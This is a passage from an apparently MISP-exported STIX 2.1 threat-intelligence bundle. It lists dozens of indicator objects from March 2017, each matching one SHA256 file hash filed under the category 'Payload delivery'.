"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '8ff4c76bc1bf9a10b17fdcfdd300b89df94be848ecb0af81f6aefba38ec5bfae']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69dc-7f6c-4779-a15b-414a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69dd-e124-4b97-bd97-43cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69de-ca20-412f-ac2e-4bb8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f3e45f9e4dbd773b64cfe164de9e42f250f996b58b619fc2f0773be7965d235d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69df-69bc-4b73-8220-4e24950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e1-1f40-448b-9961-4a53950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e2-7a9c-4384-8504-42da950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e3-ccac-483b-accc-483f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e4-996c-4da1-8483-4de1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e5-8a78-4249-b619-41a0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e6-b744-4fa1-a8e4-457b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e7-6748-4b5c-a2c6-4154950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e8-1180-4736-bccf-4fb5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'bfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69e9-6154-457d-8f82-409c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ea-e660-434c-9e00-4462950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ec-adac-45b3-a6c7-4ee0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ed-fa50-41fe-9034-4ac3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ee-a6c0-4078-815c-42a1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ef-8140-4012-8d68-4062950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f0-6b60-408f-93d7-40f2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f1-42e4-46d0-9d9d-4eba950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f2-5bcc-488b-9237-42bc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f3-4d98-491f-9a3f-41fa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f4-bc74-4e60-8258-44cb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f5-1da4-4d67-b360-441c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f6-cfc8-4d0c-9aae-4e5c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f7-cb7c-40cf-9f3e-45a7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69f9-09e4-404e-8592-4b62950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69fa-bbf8-426f-b5e5-449a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69fb-af00-443c-925a-4bf8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69fc-f64c-486f-9536-4e18950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69fd-e3b4-4945-a6be-4d8f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9003bfa0553e0e027105f822d08a82050854ecf6488db4d3c412d6996b1bf632']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69fe-6244-43b0-8c98-4b56950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
